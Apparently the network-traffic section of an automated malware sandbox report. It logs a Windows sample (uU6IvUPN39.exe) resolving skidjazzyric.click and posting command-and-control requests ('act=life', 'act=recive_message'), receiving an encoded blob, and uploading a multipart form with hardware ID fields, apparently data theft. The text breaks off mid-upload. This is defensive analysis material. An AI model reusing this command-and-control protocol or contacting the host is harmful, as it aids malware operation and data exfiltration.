Jan 9, 2025 08:43:37.411216974 CET	443	49707	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:37.411231041 CET	49707	443	192.168.2.8	104.21.96.1
Jan 9, 2025 08:43:37.411254883 CET	443	49707	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:37.411297083 CET	49707	443	192.168.2.8	104.21.96.1
Jan 9, 2025 08:43:37.411303043 CET	443	49707	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:37.411339998 CET	443	49707	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:37.411380053 CET	49707	443	192.168.2.8	104.21.96.1
Jan 9, 2025 08:43:37.411715031 CET	49707	443	192.168.2.8	104.21.96.1
Jan 9, 2025 08:43:37.411727905 CET	443	49707	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:37.411739111 CET	49707	443	192.168.2.8	104.21.96.1
Jan 9, 2025 08:43:37.411744118 CET	443	49707	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:37.568056107 CET	49708	443	192.168.2.8	104.21.96.1
Jan 9, 2025 08:43:37.568121910 CET	443	49708	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:37.568228960 CET	49708	443	192.168.2.8	104.21.96.1
Jan 9, 2025 08:43:37.568556070 CET	49708	443	192.168.2.8	104.21.96.1
Jan 9, 2025 08:43:37.568567991 CET	443	49708	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:38.043437004 CET	443	49708	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:38.043715954 CET	49708	443	192.168.2.8	104.21.96.1
Jan 9, 2025 08:43:38.044951916 CET	49708	443	192.168.2.8	104.21.96.1
Jan 9, 2025 08:43:38.044982910 CET	443	49708	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:38.045241117 CET	443	49708	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:38.046425104 CET	49708	443	192.168.2.8	104.21.96.1
Jan 9, 2025 08:43:38.046588898 CET	49708	443	192.168.2.8	104.21.96.1
Jan 9, 2025 08:43:38.046624899 CET	443	49708	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:38.622700930 CET	443	49708	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:38.622801065 CET	443	49708	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:38.622859955 CET	49708	443	192.168.2.8	104.21.96.1
Jan 9, 2025 08:43:38.623074055 CET	49708	443	192.168.2.8	104.21.96.1
Jan 9, 2025 08:43:38.623099089 CET	443	49708	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:38.726619005 CET	49709	443	192.168.2.8	104.21.96.1
Jan 9, 2025 08:43:38.726675034 CET	443	49709	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:38.726767063 CET	49709	443	192.168.2.8	104.21.96.1
Jan 9, 2025 08:43:38.727055073 CET	49709	443	192.168.2.8	104.21.96.1
Jan 9, 2025 08:43:38.727065086 CET	443	49709	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:39.209408998 CET	443	49709	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:39.209527969 CET	49709	443	192.168.2.8	104.21.96.1
Jan 9, 2025 08:43:39.504125118 CET	49709	443	192.168.2.8	104.21.96.1
Jan 9, 2025 08:43:39.504156113 CET	443	49709	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:39.504488945 CET	443	49709	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:39.506520033 CET	49709	443	192.168.2.8	104.21.96.1
Jan 9, 2025 08:43:39.506730080 CET	49709	443	192.168.2.8	104.21.96.1
Jan 9, 2025 08:43:39.506758928 CET	443	49709	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:39.506812096 CET	49709	443	192.168.2.8	104.21.96.1
Jan 9, 2025 08:43:39.506818056 CET	443	49709	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:40.002528906 CET	443	49709	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:40.002635956 CET	443	49709	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:40.002731085 CET	49709	443	192.168.2.8	104.21.96.1
Jan 9, 2025 08:43:40.002942085 CET	49709	443	192.168.2.8	104.21.96.1
Jan 9, 2025 08:43:40.002959967 CET	443	49709	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:40.282191992 CET	49710	443	192.168.2.8	104.21.96.1
Jan 9, 2025 08:43:40.282262087 CET	443	49710	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:40.282360077 CET	49710	443	192.168.2.8	104.21.96.1
Jan 9, 2025 08:43:40.282725096 CET	49710	443	192.168.2.8	104.21.96.1
Jan 9, 2025 08:43:40.282743931 CET	443	49710	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:40.747092962 CET	443	49710	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:40.747262955 CET	49710	443	192.168.2.8	104.21.96.1
Jan 9, 2025 08:43:40.748456955 CET	49710	443	192.168.2.8	104.21.96.1
Jan 9, 2025 08:43:40.748471975 CET	443	49710	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:40.748713970 CET	443	49710	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:40.750006914 CET	49710	443	192.168.2.8	104.21.96.1
Jan 9, 2025 08:43:40.750160933 CET	49710	443	192.168.2.8	104.21.96.1
Jan 9, 2025 08:43:40.750193119 CET	443	49710	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:40.750264883 CET	49710	443	192.168.2.8	104.21.96.1
Jan 9, 2025 08:43:40.750277996 CET	443	49710	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:41.383359909 CET	443	49710	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:41.383455038 CET	443	49710	104.21.96.1	192.168.2.8
Jan 9, 2025 08:43:41.383510113 CET	49710	443	192.168.2.8	104.21.96.1
Jan 9, 2025 08:43:41.384829044 CET	49710	443	192.168.2.8	104.21.96.1
Jan 9, 2025 08:43:41.384851933 CET	443	49710	104.21.96.1	192.168.2.8

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 9, 2025 08:43:35.059890032 CET	55011	53	192.168.2.8	1.1.1.1
Jan 9, 2025 08:43:35.072725058 CET	53	55011	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 9, 2025 08:43:35.059890032 CET	192.168.2.8	1.1.1.1	0xc863	Standard query (0)	skidjazzyric.click	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 9, 2025 08:43:35.072725058 CET	1.1.1.1	192.168.2.8	0xc863	No error (0)	skidjazzyric.click	104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:43:35.072725058 CET	1.1.1.1	192.168.2.8	0xc863	No error (0)	skidjazzyric.click	104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:43:35.072725058 CET	1.1.1.1	192.168.2.8	0xc863	No error (0)	skidjazzyric.click	104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:43:35.072725058 CET	1.1.1.1	192.168.2.8	0xc863	No error (0)	skidjazzyric.click	104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:43:35.072725058 CET	1.1.1.1	192.168.2.8	0xc863	No error (0)	skidjazzyric.click	104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:43:35.072725058 CET	1.1.1.1	192.168.2.8	0xc863	No error (0)	skidjazzyric.click	104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:43:35.072725058 CET	1.1.1.1	192.168.2.8	0xc863	No error (0)	skidjazzyric.click	104.21.16.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

skidjazzyric.click

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49706	104.21.96.1	443	2960	C:\Users\user\Desktop\uU6IvUPN39.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 07:43:35 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: skidjazzyric.click
2025-01-09 07:43:35 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2025-01-09 07:43:36 UTC	1127	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 07:43:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=qt3eu9shu8nnfgbju12sb5d3cu; expires=Mon, 05 May 2025 01:30:14 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3hB2HY0BnpDQUHzo68Yfe2wlYIpn2bGLBI%2F0hvShUlelafeXwGNePI6nxvas1ieBNJOQoyqFHodsB82TGsuWuOH9QaL2QLriLPrniS%2FcBNIJWeanRfODITd67WZrL6o9m%2FYBT24%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff2cc17fff872a4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1951&min_rtt=1945&rtt_var=743&sent=8&recv=8&lost=0&retrans=0&sent_bytes=3058&recv_bytes=909&delivery_rate=2190000&cwnd=213&unsent_bytes=0&cid=74ce18b5f86b7617&ts=470&x=0"
2025-01-09 07:43:36 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2025-01-09 07:43:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49707	104.21.96.1	443	2960	C:\Users\user\Desktop\uU6IvUPN39.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 07:43:36 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 74 Host: skidjazzyric.click
2025-01-09 07:43:36 UTC	74	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 68 35 56 66 48 2d 2d 26 6a 3d 31 34 34 38 62 62 36 32 65 31 32 37 36 38 32 31 64 35 30 32 34 36 65 62 38 38 62 33 31 30 39 66 Data Ascii: act=recive_message&ver=4.0&lid=4h5VfH--&j=1448bb62e1276821d50246eb88b3109f
2025-01-09 07:43:37 UTC	1125	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 07:43:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=11tss4j14pc5jsled9uekuhtte; expires=Mon, 05 May 2025 01:30:15 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QBvm0zWQ4n1uo5bmIUp5VFNkSqBZOgNpTkkgGjO0u6UHy4%2BR1HirR3YchdJZBumayjUoaFRHF9iTsQYS2a4HCZWFI9HIiT%2BChklnZ4ogIFNhX7Uk4GIsCqnkoUAQDtlqN5TCZ4M%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff2cc1e0a2c4363-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1549&min_rtt=1545&rtt_var=589&sent=7&recv=8&lost=0&retrans=0&sent_bytes=3057&recv_bytes=976&delivery_rate=2766898&cwnd=241&unsent_bytes=0&cid=4815b0303ab9bed5&ts=763&x=0"
2025-01-09 07:43:37 UTC	244	IN	Data Raw: 31 34 38 37 0d 0a 2b 57 4d 62 41 5a 57 54 6c 37 46 2f 52 54 61 38 73 53 78 6c 63 43 79 74 67 6d 72 6a 50 48 76 78 70 4b 62 47 6c 75 67 48 4a 67 53 43 51 57 30 6a 72 36 65 37 6b 77 77 67 46 49 62 46 58 68 41 56 41 49 2f 6a 44 73 45 47 48 5a 44 49 31 61 4f 36 79 6e 46 4c 4a 73 4d 46 65 6d 33 6d 39 72 75 54 47 6a 30 55 68 75 70 58 52 78 56 43 6a 37 68 49 68 6c 59 5a 6b 4d 6a 45 70 2f 32 48 64 30 70 6e 6b 51 39 38 61 66 44 77 38 39 41 54 4b 46 50 5a 31 45 30 50 48 6b 58 41 36 67 66 42 45 46 6d 55 33 6f 54 38 74 4b 56 69 55 6d 57 30 41 6d 68 71 74 2b 36 37 79 6c 30 67 57 4a 36 4c 44 67 51 56 54 73 48 6b 44 6f 68 55 45 35 6e 41 78 61 4c 38 6d 47 35 41 62 4a 45 42 66 32 6a 36 2b 65 66 64 47 53 39 59 33 39 35 4e 52 31 77 4f 79 50 Data Ascii: 1487+WMbAZWTl7F/RTa8sSxlcCytgmrjPHvxpKbGlugHJgSCQW0jr6e7kwwgFIbFXhAVAI/jDsEGHZDI1aO6ynFLJsMFem3m9ruTGj0UhupXRxVCj7hIhlYZkMjEp/2Hd0pnkQ98afDw89ATKFPZ1E0PHkXA6gfBEFmU3oT8tKViUmW0Amhqt+67yl0gWJ6LDgQVTsHkDohUE5nAxaL8mG5AbJEBf2j6+efdGS9Y395NR1wOyP
2025-01-09 07:43:37 UTC	1369	IN	Data Raw: 68 49 32 52 35 4b 6f 63 58 56 74 65 47 48 64 55 49 6d 68 45 39 67 49 2f 44 39 74 59 74 64 4c 31 6a 51 31 6b 30 49 46 55 2f 50 38 67 65 42 58 52 47 62 77 73 36 72 2b 34 56 72 54 6d 47 54 43 48 35 73 38 50 6e 7a 33 42 35 6e 47 70 37 55 56 6b 64 4b 44 75 2f 77 43 34 4a 4b 46 49 4b 47 32 2b 72 74 79 6d 4a 49 4a 73 4e 42 66 32 33 32 2f 50 58 42 46 53 78 66 32 38 46 46 44 68 39 44 7a 2b 30 43 6a 6c 30 5a 6c 4d 7a 4f 71 2f 36 4f 61 45 6c 67 6d 77 45 35 4c 62 66 32 37 5a 4e 46 5a 33 66 62 77 30 6b 4c 42 41 7a 31 6f 42 66 50 52 31 6d 55 79 6f 54 38 74 49 4a 67 52 32 57 51 44 6e 70 72 2f 4f 50 31 77 52 73 71 55 63 7a 56 53 77 6b 59 54 64 33 71 42 6f 64 64 45 4a 6a 50 77 61 50 77 79 69 73 45 59 59 4e 42 49 53 50 57 2f 50 37 66 46 7a 42 55 6e 73 77 41 48 6c 4a 4a 77 Data Ascii: hI2R5KocXVteGHdUImhE9gI/D9tYtdL1jQ1k0IFU/P8geBXRGbws6r+4VrTmGTCH5s8Pnz3B5nGp7UVkdKDu/wC4JKFIKG2+rtymJIJsNBf232/PXBFSxf28FFDh9Dz+0Cjl0ZlMzOq/6OaElgmwE5Lbf27ZNFZ3fbw0kLBAz1oBfPR1mUyoT8tIJgR2WQDnpr/OP1wRsqUczVSwkYTd3qBoddEJjPwaPwyisEYYNBISPW/P7fFzBUnswAHlJJw
2025-01-09 07:43:37 UTC	1369	IN	Data Raw: 52 46 4a 2b 47 69 75 54 7a 6b 69 55 63 4a 72 45 43 62 57 44 39 73 38 44 51 45 79 6c 54 79 4a 4e 52 53 51 73 4f 79 4f 78 49 32 52 34 55 6b 73 37 43 74 76 75 48 5a 6b 70 6f 6c 41 52 32 61 2f 66 78 2b 4e 59 5a 4c 46 2f 64 33 6b 6f 56 47 45 37 48 35 51 6d 4c 56 46 6e 64 68 73 4f 38 74 4e 49 6c 64 58 47 51 51 30 78 67 2b 66 2f 79 78 56 30 34 47 73 65 54 53 51 74 53 46 6f 2f 74 41 49 52 62 46 70 4c 4d 79 71 48 2b 68 6d 31 4b 5a 59 6b 4f 66 57 50 37 2b 66 2f 65 45 79 4e 63 31 39 68 46 41 52 4a 50 78 61 42 47 77 56 6b 42 30 35 36 45 6b 50 4f 47 61 45 73 6b 72 67 4a 33 62 66 44 6e 74 63 78 54 50 68 54 5a 33 77 35 66 55 6b 4c 47 34 41 4f 4c 57 68 6d 55 79 38 47 6e 38 34 6c 6f 51 32 79 56 42 6e 31 76 2f 76 7a 7a 30 78 6f 6a 55 63 7a 57 52 77 73 65 44 6f 47 67 44 35 Data Ascii: RFJ+GiuTzkiUcJrECbWD9s8DQEylTyJNRSQsOyOxI2R4Uks7CtvuHZkpolAR2a/fx+NYZLF/d3koVGE7H5QmLVFndhsO8tNIldXGQQ0xg+f/yxV04GseTSQtSFo/tAIRbFpLMyqH+hm1KZYkOfWP7+f/eEyNc19hFARJPxaBGwVkB056EkPOGaEskrgJ3bfDntcxTPhTZ3w5fUkLG4AOLWhmUy8Gn84loQ2yVBn1v/vzz0xojUczWRwseDoGgD5
2025-01-09 07:43:37 UTC	1369	IN	Data Raw: 68 73 4f 6f 74 4e 49 6c 54 57 2b 4a 44 33 64 71 2b 76 66 39 31 42 4d 71 58 39 6a 59 53 51 41 55 51 38 66 74 44 59 4a 66 48 5a 6e 55 78 36 2f 2b 68 32 38 45 4b 4e 73 47 59 53 4f 76 73 64 4c 66 4e 44 64 50 7a 4d 55 4f 47 46 78 58 6a 2b 63 45 77 51 5a 5a 6b 4d 6e 4e 71 2f 79 43 61 6b 74 69 6c 51 64 2f 62 76 4c 2b 2f 38 45 56 4b 56 6e 56 33 45 55 56 45 6b 50 4c 37 41 79 4a 56 52 50 54 69 49 53 6a 37 4d 6f 39 42 46 4f 57 44 6e 6c 67 34 62 48 71 6e 51 52 6e 55 39 4b 54 46 6b 63 65 51 4d 2f 76 42 49 31 56 45 5a 4c 4b 79 71 50 78 67 32 31 4d 64 4a 6f 46 63 57 4c 35 2f 76 54 58 47 43 4a 51 32 64 64 49 43 46 49 41 6a 2b 63 51 77 51 5a 5a 76 4f 48 78 35 74 57 77 4a 56 73 6f 67 6b 46 2b 62 37 65 70 74 64 38 65 4b 31 7a 52 31 55 63 4c 47 45 66 45 37 41 4f 46 55 68 43 Data Ascii: hsOotNIlTW+JD3dq+vf91BMqX9jYSQAUQ8ftDYJfHZnUx6/+h28EKNsGYSOvsdLfNDdPzMUOGFxXj+cEwQZZkMnNq/yCaktilQd/bvL+/8EVKVnV3EUVEkPL7AyJVRPTiISj7Mo9BFOWDnlg4bHqnQRnU9KTFkceQM/vBI1VEZLKyqPxg21MdJoFcWL5/vTXGCJQ2ddICFIAj+cQwQZZvOHx5tWwJVsogkF+b7eptd8eK1zR1UcLGEfE7AOFUhC
2025-01-09 07:43:37 UTC	912	IN	Data Raw: 66 57 4d 64 30 4e 76 69 51 39 30 62 50 2f 35 2f 4e 49 5a 49 6c 6e 59 33 30 51 47 46 55 44 42 36 45 6a 50 48 68 36 4c 68 70 7a 6b 31 5a 70 2b 56 6e 43 57 49 48 52 73 74 2b 36 37 79 6c 30 67 57 4a 36 4c 44 67 34 41 53 73 4c 79 41 59 5a 51 46 70 44 55 78 61 6e 2f 6d 47 4a 4c 59 70 77 4e 66 32 7a 78 38 50 44 5a 45 53 42 52 31 64 78 43 52 31 77 4f 79 50 68 49 32 52 34 33 6d 4e 58 54 70 2f 71 42 63 31 38 6d 68 45 39 67 49 2f 44 39 74 59 74 64 4a 46 2f 56 31 30 34 4c 45 6b 72 43 34 42 71 4f 57 52 36 61 7a 64 61 75 38 34 31 75 54 47 32 55 42 32 74 76 2b 65 50 77 77 51 39 6e 47 70 37 55 56 6b 64 4b 44 76 6e 6e 47 4a 46 64 57 36 4c 51 78 37 4c 2f 68 32 6b 45 65 64 55 59 4f 57 54 37 73 61 32 54 47 79 68 64 33 64 78 50 44 68 35 44 79 75 6b 4e 67 46 67 64 6d 63 7a 45 Data Ascii: fWMd0NviQ90bP/5/NIZIlnY30QGFUDB6EjPHh6Lhpzk1Zp+VnCWIHRst+67yl0gWJ6LDg4ASsLyAYZQFpDUxan/mGJLYpwNf2zx8PDZESBR1dxCR1wOyPhI2R43mNXTp/qBc18mhE9gI/D9tYtdJF/V104LEkrC4BqOWR6azdau841uTG2UB2tv+ePwwQ9nGp7UVkdKDvnnGJFdW6LQx7L/h2kEedUYOWT7sa2TGyhd3dxPDh5DyukNgFgdmczE
2025-01-09 07:43:37 UTC	1369	IN	Data Raw: 33 38 30 39 0d 0a 79 2f 4e 41 61 4c 6c 4c 56 30 45 51 49 46 55 6a 4c 34 41 4f 47 55 42 2b 57 7a 63 33 6b 75 73 70 69 58 43 62 44 51 56 39 41 35 65 50 48 33 52 34 38 46 4d 47 64 56 30 63 56 51 6f 2b 34 53 49 70 57 46 6f 48 44 7a 61 7a 77 67 32 56 41 62 4a 59 47 65 57 62 36 39 50 48 64 47 53 42 55 30 74 78 4a 44 78 31 4b 7a 2b 39 49 7a 78 34 65 69 34 61 63 35 4e 53 42 63 32 56 6f 6b 42 4d 35 66 4c 6e 6f 74 64 51 52 5a 77 79 65 33 55 63 47 47 6b 44 44 36 41 79 54 58 68 4b 61 79 63 57 72 39 49 6c 6b 54 6d 36 4a 42 33 6c 6f 2f 2f 62 39 31 78 4d 31 56 64 47 54 41 45 63 56 56 6f 2b 34 53 4c 42 49 48 70 54 4a 68 6f 33 7a 6b 57 52 4f 5a 5a 41 4e 4f 58 79 35 36 4c 58 55 45 57 63 4d 6e 74 35 43 43 68 5a 63 77 2b 41 49 69 46 6b 54 67 63 6e 4c 71 66 65 4b 59 46 5a 6e Data Ascii: 3809y/NAaLlLV0EQIFUjL4AOGUB+Wzc3kuspiXCbDQV9A5ePH3R48FMGdV0cVQo+4SIpWFoHDzazwg2VAbJYGeWb69PHdGSBU0txJDx1Kz+9Izx4ei4ac5NSBc2VokBM5fLnotdQRZwye3UcGGkDD6AyTXhKaycWr9IlkTm6JB3lo//b91xM1VdGTAEcVVo+4SLBIHpTJho3zkWROZZANOXy56LXUEWcMnt5CChZcw+AIiFkTgcnLqfeKYFZn
2025-01-09 07:43:37 UTC	1369	IN	Data Raw: 2f 32 39 76 4c 59 44 79 78 47 31 64 74 4e 43 52 70 48 7a 2b 34 49 67 46 4d 5a 30 34 69 45 6f 2b 7a 4b 50 51 52 44 75 42 5a 76 61 62 58 53 34 73 55 58 49 46 6a 49 32 45 38 45 42 45 50 66 6f 45 62 42 54 78 36 43 68 70 79 79 35 4a 31 69 57 79 69 43 51 58 35 76 74 36 6d 31 32 42 49 70 57 64 58 58 52 77 49 61 54 63 72 6c 41 6f 31 53 47 4a 76 50 7a 71 48 78 6a 47 39 48 61 4a 51 41 64 57 66 2b 2f 2f 79 54 55 32 64 54 78 70 4d 57 52 79 52 65 79 50 67 46 6b 52 77 72 6b 4e 66 56 73 66 6d 61 59 77 5a 4a 6d 41 31 36 5a 76 44 68 74 63 78 54 50 68 54 5a 33 77 35 66 55 6b 37 4c 37 41 75 47 55 42 61 65 79 63 4f 76 2b 34 42 72 56 6d 6d 65 43 58 56 72 2b 75 50 2f 32 51 38 75 58 64 50 64 52 68 55 52 44 6f 47 67 44 35 6b 65 51 64 50 30 7a 71 66 34 6e 47 68 4c 4a 6f 52 50 59 Data Ascii: /29vLYDyxG1dtNCRpHz+4IgFMZ04iEo+zKPQRDuBZvabXS4sUXIFjI2E8EBEPfoEbBTx6Chpyy5J1iWyiCQX5vt6m12BIpWdXXRwIaTcrlAo1SGJvPzqHxjG9HaJQAdWf+//yTU2dTxpMWRyReyPgFkRwrkNfVsfmaYwZJmA16ZvDhtcxTPhTZ3w5fUk7L7AuGUBaeycOv+4BrVmmeCXVr+uP/2Q8uXdPdRhURDoGgD5keQdP0zqf4nGhLJoRPY
2025-01-09 07:43:37 UTC	1369	IN	Data Raw: 32 33 52 4d 67 51 73 2b 54 41 45 63 64 44 70 66 5a 53 4d 6b 65 4a 74 32 47 33 4f 53 73 79 6c 42 48 61 4a 55 47 62 33 4b 36 30 66 37 46 48 43 70 66 30 70 46 50 43 67 4a 4a 6a 36 35 49 68 78 35 42 77 34 69 45 6f 4f 58 4b 50 52 51 30 77 46 51 71 4e 4b 65 6a 36 70 30 45 5a 30 4b 65 69 78 78 4a 55 6c 79 50 75 45 6a 47 58 51 75 42 77 4d 65 79 39 38 31 62 65 6b 61 51 44 58 70 76 39 76 61 31 6e 56 30 6f 46 49 62 71 44 67 51 41 58 49 44 78 48 6f 78 4f 48 74 2f 4f 31 61 6e 34 79 69 73 45 4b 70 38 4b 64 57 62 77 34 62 72 42 44 53 78 59 79 4a 39 4b 46 56 49 41 6a 2f 45 44 6a 6b 77 58 6c 49 6e 56 73 76 6d 61 5a 6b 46 68 31 77 6c 6f 62 76 75 78 75 35 4d 49 4c 46 6a 59 33 6c 74 49 41 31 6a 4d 39 67 2f 4e 56 67 69 65 79 6f 53 62 75 73 70 39 42 44 37 62 4e 48 70 74 2b 66 Data Ascii: 23RMgQs+TAEcdDpfZSMkeJt2G3OSsylBHaJUGb3K60f7FHCpf0pFPCgJJj65Ihx5Bw4iEoOXKPRQ0wFQqNKej6p0EZ0KeixxJUlyPuEjGXQuBwMey981bekaQDXpv9va1nV0oFIbqDgQAXIDxHoxOHt/O1an4yisEKp8KdWbw4brBDSxYyJ9KFVIAj/EDjkwXlInVsvmaZkFh1wlobvuxu5MILFjY3ltIA1jM9g/NVgieyoSbusp9BD7bNHpt+f
2025-01-09 07:43:37 UTC	1369	IN	Data Raw: 41 56 66 5a 31 55 30 4a 42 56 2b 50 72 6b 69 48 48 6b 48 42 69 49 53 67 35 63 6f 39 46 44 54 41 56 43 6f 30 70 36 50 71 6e 51 52 6e 51 70 36 4c 48 55 6c 53 58 49 2b 34 53 4d 5a 51 46 4a 4c 46 79 71 66 6d 6d 47 4e 48 63 4a 68 47 52 31 33 53 2f 50 6a 57 45 79 42 71 34 50 4a 45 46 78 39 42 79 4e 34 32 74 6b 38 65 67 34 54 69 70 2b 4b 4a 4a 51 6f 6d 67 30 45 68 49 39 62 37 35 64 34 53 49 42 53 51 6b 30 70 48 53 67 37 71 37 51 57 45 55 42 37 52 35 38 36 30 2b 59 56 69 42 43 6a 62 44 54 6b 37 74 2f 44 2f 77 78 41 6f 55 35 4c 55 56 41 42 53 41 49 2f 75 53 4e 6b 65 47 4a 6e 57 79 61 76 7a 78 6d 4e 4b 61 4e 73 65 4e 33 71 33 35 37 57 4c 54 6d 6b 55 7a 4a 4d 57 52 31 56 41 77 75 45 4c 6a 31 30 4c 67 63 44 48 73 76 66 4e 57 33 70 44 6c 67 78 38 62 66 44 50 79 2f 49 Data Ascii: AVfZ1U0JBV+PrkiHHkHBiISg5co9FDTAVCo0p6PqnQRnQp6LHUlSXI+4SMZQFJLFyqfmmGNHcJhGR13S/PjWEyBq4PJEFx9ByN42tk8eg4Tip+KJJQomg0EhI9b75d4SIBSQk0pHSg7q7QWEUB7R5860+YViBCjbDTk7t/D/wxAoU5LUVABSAI/uSNkeGJnWyavzxmNKaNseN3q357WLTmkUzJMWR1VAwuELj10LgcDHsvfNW3pDlgx8bfDPy/I

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49708	104.21.96.1	443	2960	C:\Users\user\Desktop\uU6IvUPN39.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 07:43:38 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=6CP9VWM5QP1IM68YUR User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12841 Host: skidjazzyric.click
2025-01-09 07:43:38 UTC	12841	OUT	Data Raw: 2d 2d 36 43 50 39 56 57 4d 35 51 50 31 49 4d 36 38 59 55 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 44 31 33 35 30 31 35 45 43 41 46 30 36 37 32 44 30 36 33 32 44 46 30 45 32 38 44 43 34 31 32 0d 0a 2d 2d 36 43 50 39 56 57 4d 35 51 50 31 49 4d 36 38 59 55 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 36 43 50 39 56 57 4d 35 51 50 31 49 4d 36 38 59 55 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 36 Data Ascii: --6CP9VWM5QP1IM68YURContent-Disposition: 